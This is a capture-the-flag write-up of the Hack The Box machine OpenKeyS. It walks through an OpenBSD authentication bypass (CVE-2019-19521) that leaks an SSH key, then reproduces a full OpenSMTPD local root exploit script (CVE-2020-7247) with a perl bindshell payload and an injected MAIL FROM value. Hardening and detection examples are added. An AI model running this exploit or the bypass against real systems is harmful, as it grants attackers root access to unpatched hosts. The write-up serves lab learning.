Hack The Box Writeup: OpenKeyS

This box is the first OpenBSD machine I have done on Hack The Box. As the name suggests, it has something to do with OpenSSH keys. The foothold was very interesting; root was a bit easy for a medium box. Nevertheless, a great box.

[0x1] Reconnaissance & Enumeration

First action of the day: a port scan! This box only has two open ports, which gives me the feeling that the initial foothold will be over a website/web application.

nmap -sC -sV -p- -oA openkeys-allports 10.10.10.199

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-11 14:33 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.10.199
Host is up (0.053s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
| 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open http OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).

Since port 80 is open and runs a webserver, I start gobuster in the background to search for specific files and folders. There are a few folders that could be enumerated by gobuster and the most interesting one is the includes folder.

gobuster dir -u http://openkeys -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://openkeys
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php,zip
[+] Timeout: 10s
===============================================================
2020/11/11 14:42:04 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/fonts (Status: 301)

A quick check to see what is running on port 80. Just a login page, with nothing more to see or notice in the code.

[0x2] Initial Foothold

During the gobuster scan, I noticed that there was an includes folder. Since I had already tried various attacks on the login form, like SQLi, I decided to check out the folder. There are two files in there, one PHP file and a swap file.

I decided to download the files to further analyze them on my machine. The first lines show something that looks like a username. After that, there is a lot of code, but at the bottom, there is a good hint towards the vulnerability.

b0VIM 8.1
jennifer
openkeys.htb
/var/www/htdocs/includes/auth.php
3210
#"!
    session_start();
    session_destroy();
    session_unset();
function close_session()
    $_SESSION["username"] = $_REQUEST['username'];
    $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT'];
    $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR'];
    $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["login_time"] = $_SERVER['REQUEST_TIME'];
    $_SESSION["logged_in"] = True;
function init_session()
    }
        return False;
    {
    else
    }
        }
            return True;
            $_SESSION['last_activity'] = $time;
            // Session is active, update last activity time and return True
        {
        else
        }
            return False;
            close_session();
        {
            ($time - $_SESSION['last_activity']) > $session_timeout)
        if (isset($_SESSION['last_activity']) &&
        $time = $_SERVER['REQUEST_TIME'];
        // Has the session expired?
    {
    if(isset($_SESSION["logged_in"]))
    // Is the user logged in?
    session_start();
    // Start the session
    $session_timeout = 300;
    // Session timeout in seconds
function is_active_session()
    return $retcode;
    system($cmd, $retcode);
    $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);
function authenticate($username, $password)
<?php

The username appears to be something like jennifer@openkeys.htb. So that kind of hints at the fact that we need a password or something. The last lines include a hint to the check_auth file. After some searching on the web, based on this file, I found an article about a vulnerability identified as CVE-2019-19521: Authentication bypass. It says that there is a way to bypass authentication by using a flaw in the way OpenBSD parses the username. Entering ‘-schannel’ as the username and a random password makes OpenBSD think you are providing the parameter ‘-option’ to tell the library to use the challenge protocol.

So, the first thing I did was to enter ‘-schannel’ as the username and idontknow as the password. After submitting this set of credentials the website shows a successful login, but no key :(

So having this method to login is not all that is needed to crash this party. Since there is no other way to use the found username ‘jennifer’ in this login and keep the -schannel, I tried adding it to the request to pass along with the cookie.

As you can see, the username is ‘-schannel’ and the password something random. At the end of the cookie, I added ‘username=jennifer’ and then forwarded the request to the server.

[Screenshot: HTB OpenKeyS Burp request]

Bingo! The website returns the private key for Jennifer. Knowing that the server also had OpenSSH running on 22/tcp, this might get me in the box.

I stored the private key in a file and used it to connect with the username ‘jennifer’ to the box. It worked instantly and now I have a full shell on the machine.

ssh jennifer@openkeys.htb -i sshkey_jennifer.txt
The authenticity of host 'openkeys.htb (10.10.10.199)' can't be established.
ECDSA key fingerprint is SHA256:gzhq4BokiWZ1NNWrblA8w3hLOhlhoRy+NFyi2smBZOA. 
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'openkeys.htb' (ECDSA) to the list of known hosts.
Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2
OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

openkeys$ whoami
jennifer
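
The bypass in this section rests on two things visible in the recovered auth.php: escapeshellcmd() lets a username that begins with ‘-’ reach check_auth looking like an option, and init_session() takes the session username from $_REQUEST. The hardened variants below are an added example, not code from the box or from the original post; the *_hardened names, is_valid_username() and the permitted username characters are assumptions.

```php
<?php
// Added example: hardened variants of authenticate() and init_session() from
// the recovered auth.php. The *_hardened names, is_valid_username() and the
// permitted username characters are assumptions.

// A username must start with a letter or digit, so "-schannel" can never
// reach check_auth looking like a command-line option.
function is_valid_username(string $username): bool
{
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,31}\z/', $username) === 1;
}

function authenticate_hardened(string $username, string $password): int
{
    if (!is_valid_username($username)) {
        throw new InvalidArgumentException('invalid username');
    }
    // escapeshellcmd() only neutralises shell metacharacters in the whole
    // string; escapeshellarg() quotes each argument as a single word.
    $cmd = '../auth_helpers/check_auth '
         . escapeshellarg($username) . ' ' . escapeshellarg($password);
    system($cmd, $retcode);
    return $retcode; // same contract as the original authenticate()
}

// Takes the name that was just authenticated instead of re-reading it from
// $_REQUEST, which can be filled from a cookie (the username=jennifer case).
function init_session_hardened(string $authenticatedUser): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    session_regenerate_id(true); // fresh session ID after login
    $_SESSION['logged_in']     = true;
    $_SESSION['username']      = $authenticatedUser;
    $_SESSION['user_agent']    = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $_SESSION['remote_addr']   = $_SERVER['REMOTE_ADDR'] ?? '';
    $_SESSION['last_activity'] = $_SERVER['REQUEST_TIME'];
    $_SESSION['login_time']    = $_SERVER['REQUEST_TIME'];
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs; "-schannel" is the value used in the write-up.
    foreach (['jennifer', '-schannel', 'two words'] as $u) {
        printf("%-10s %s\n", $u, is_valid_username($u) ? 'accepted' : 'rejected');
    }
}
```

The password still travels on the helper's command line here, as in the original; handing it over on stdin would keep it out of the process list.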

[0x3] Path to User flag

With the fresh shell for jennifer, I try to see if the user flag is part of this account. A quick ls shows the user.txt file.

openkeys$ ls -la
total 40
drwxr-xr-x 3 jennifer jennifer 512 Jun 23 13:58 .
drwxr-xr-x 3 root wheel 512 Jan 13 2020 ..
-rw-r--r-- 1 jennifer jennifer 87 Jan 13 2020 .Xdefaults
-rw-r--r-- 1 jennifer jennifer 771 Jan 13 2020 .cshrc
-rw-r--r-- 1 jennifer jennifer 101 Jan 13 2020 .cvsrc
-rw-r--r-- 1 jennifer jennifer 359 Jan 13 2020 .login
-rw-r--r-- 1 jennifer jennifer 175 Jan 13 2020 .mailrc
-rw-r--r-- 1 jennifer jennifer 215 Jan 13 2020 .profile
drwx------ 2 jennifer jennifer 512 Jan 13 2020 .ssh
-rw-r----- 1 jennifer jennifer 33 Jan 14 2020 user.txt

There is always a chance that we do not have permissions on the file, or that the content is encrypted. In this case the flag is readable and ready to submit.

openkeys$ cat user.txt
36ab21239a15c537bde90626891d2b10

[0x4] Path to Root flag - privilege escalation

The first thing I did, after grabbing the flag, was to look around a bit. I didn’t find any interesting files and linpeas also did not tell me anything interesting. After a while, I searched the internet for known privilege escalations in OpenBSD 6.6. I found an article about Local Exploits for OpenBSD 6.6, which included some interesting scripts for several CVEs.

There was a vulnerability known as CVE-2020-7247 (OpenBSD OpenSMTPD 6.6 local root exploit) which grabbed my attention. It uses a flaw in the OpenSMTPD daemon to execute commands as root via a crafted MAIL FROM address. The article also includes the exploit code for this CVE, which I pasted to a bash script on the machine.

#!/bin/sh
# root66 - OpenBSD 6.6 OpenSMTPD 6.6 local root exploit for CVE-2020-7247
# starts a perl bindshell on port 1337 with root privileges
#
# Code mostly stolen from Qualys PoCs:
# - https://www.openwall.com/lists/oss-security/2020/01/28/3
# - https://blog.qualys.com/laws-of-vulnerabilities/2020/01/29/openbsd-opensmtpd-remote-code-execution-vulnerability-cve-2020-7247
# - https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
# ---
# openbsd-6-6-x64$ ./root66
# OpenBSD 6.6 OpenSMTPD 6.6 local root exploit (CVE-2020-7247)
# [*] id: uid=1001(test) gid=1001(test) groups=1001(test)
# [*] checking system ...
# [*] directory /tmp/.payload is writable
# [*] 019_smtpd_exec patch has not been installed
# [*] writing payload to /tmp/.payload ...
# [*] executing /tmp/.payload ...
# <<< 220 openbsd-6-6-x64.localdomain ESMTP OpenSMTPD
# >>> EHLO localhost
# <<< 250-openbsd-6-6-x64.localdomain Hello localhost [local], pleased to meet you
# <<< 250-8BITMIME
# <<< 250-ENHANCEDSTATUSCODES
# <<< 250-SIZE 36700160
# <<< 250 HELP
# >>> MAIL FROM:<;/tmp/.payload;#@>  
# <<< 250 2.0.0 Ok
# >>> RCPT TO:<test@openbsd-6-6-x64.localdomain> 
# <<< 250 2.1.5 Destination address valid: Recipient ok
# >>> DATA
# <<< 354 Enter mail, end with "." on a line by itself
# >>> .
# <<< 250 2.0.0 9493d192 Message accepted for delivery
# >>> QUIT
# <<< 221 2.0.0 Bye
# [*] cleaning up /tmp/.payload ...
# [*] connecting to 127.0.0.1:1337 ...
# Connection to 127.0.0.1 1337 port [tcp/*] succeeded!
# id
# uid=0(root) gid=0(wheel) groups=0(wheel)
# uname -a
# OpenBSD openbsd-6-6-x64.localdomain 6.6 GENERIC#353 amd64
# ---
# 2020-01-31 - <bcoles@gmail.com>
# https://github.com/bcoles/local-exploits/tree/master/CVE-2020-7247

payload="/tmp/.payload"
/bin/echo "OpenBSD 6.6 OpenSMTPD 6.6 local root exploit (CVE-2020-7247)"

/bin/echo "[*] id: `id`"
/bin/echo "[*] checking system ..."

if [ -w `dirname $payload` ]; then
  /bin/echo "[*] directory $payload is writable"
else
  /bin/echo "[-] directory $payload is not writable"
  exit 1
fi
if syspatch -l | grep -q 019_smtpd_exec ; then
  /bin/echo "[-] 019_smtpd_exec patch has been installed"
  exit 1
else
  /bin/echo "[*] 019_smtpd_exec patch has not been installed"
fi

/bin/echo "[*] writing payload to $payload ..."
cat > $payload << "EOF"
#!/bin/sh
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,1337,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'
EOF
/bin/chmod +x $payload
/bin/echo "[*] executing $payload ..."
/bin/echo | /usr/sbin/sendmail -v -f "<;$payload;#@>" `whoami`
/bin/sleep 1
/bin/echo "[*] cleaning up $payload ..."
/bin/rm $payload
/bin/echo "[*] connecting to 127.0.0.1:1337 ..."
nc -v 127.0.0.1 1337

I saved the script as exploit.sh and gave it execute permission. After running the script, you can see the payload is placed in the MAIL FROM command: ‘>>> MAIL FROM:<;/tmp/.payload;#@>’.

openkeys$ chmod +x exploit.sh 
openkeys$ ./exploit.sh 
OpenBSD 6.6 OpenSMTPD 6.6 local root exploit (CVE-2020-7247)
[*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel)
[*] checking system ...
[*] directory /tmp/.payload is writable
[*] 019_smtpd_exec patch has not been installed
[*] writing payload to /tmp/.payload ...
[*] executing /tmp/.payload ...
<<< 220 openkeys.htb ESMTP OpenSMTPD
>>> EHLO localhost
<<< 250-openkeys.htb Hello localhost [local], pleased to meet you
<<< 250-8BITMIME
<<< 250-ENHANCEDSTATUSCODES
<<< 250-SIZE 36700160
<<< 250 HELP
>>> MAIL FROM:<;/tmp/.payload;#@> 
<<< 250 2.0.0 Ok
>>> RCPT TO:<jennifer@openkeys.htb> 
<<< 250 2.1.5 Destination address valid: Recipient ok
>>> DATA
<<< 354 Enter mail, end with "." on a line by itself
>>> .
<<< 250 2.0.0 4d2c6e41 Message accepted for delivery
>>> QUIT
<<< 221 2.0.0 Bye
[*] cleaning up /tmp/.payload ...
[*] connecting to 127.0.0.1:1337 ...
Connection to 127.0.0.1 1337 port [tcp/*] succeeded!

The last line shows the exploit ran successfully and the local reverse shell is connected. It does not show any other information, so to check whether the exploit really succeeded I run ‘whoami’. Guess what? I am root!

whoami
root
id
uid=0(root) gid=0(wheel) groups=0(wheel)
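
The sender address in the transcript above (`MAIL FROM:<;/tmp/.payload;#@>`) is something a defender can look for in SMTP logs or captures. The check below is an added example, not part of the original post or of the exploit author's code; mail_from_findings() and the sample lines are constructed, and the allowed character set is an assumption that is deliberately stricter than RFC 5321.

```php
<?php
// Added example: flag MAIL FROM commands whose sender cannot be an ordinary
// mailbox. mail_from_findings() and the sample lines are constructed.

function mail_from_findings(string $line): array
{
    if (!preg_match('/MAIL FROM:\s*<([^>]*)>/i', $line, $m)) {
        return [];                        // not a MAIL FROM command
    }
    $addr = $m[1];
    if ($addr === '') {
        return [];                        // null sender <> is legal (bounces)
    }
    $findings = [];
    $at = strrpos($addr, '@');
    // (string) casts: substr() returns false instead of "" before PHP 8.
    $local  = $at === false ? $addr : (string) substr($addr, 0, $at);
    $domain = $at === false ? '' : (string) substr($addr, $at + 1);
    if ($domain === '') {
        $findings[] = 'missing domain';
    }
    // Stricter than RFC 5321 on purpose: ";", "/", "#", "|", "$", backticks,
    // spaces and similar characters in the local part are all reported.
    if (preg_match('/\A[A-Za-z0-9._+=-]+\z/', $local) !== 1) {
        $findings[] = 'unexpected characters in local part';
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    // Constructed transcript lines, modelled on the output shown above.
    $lines = [
        '>>> MAIL FROM:<jennifer@openkeys.htb>',
        '>>> MAIL FROM:<;/tmp/.payload;#@>',
        '>>> MAIL FROM:<>',
        '<<< 250 2.0.0 Ok',
    ];
    foreach ($lines as $l) {
        $f = mail_from_findings($l);
        if ($f) {
            printf("ALERT %s => %s\n", $l, implode('; ', $f));
        }
    }
}
```

Only the second sample line is reported, with both findings. On the host itself, the exploit script's own `syspatch -l | grep -q 019_smtpd_exec` test shows whether the fix is installed.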

The last thing to do before I can officially call the box ‘rooted’ is to grab the flag and submit it. Another nice box done and dusted.

cat root.txt
f3a553b1697050ae885e7c02dbfc6efa


All information in this post is for educational use only! Do not use it against others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!


d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?
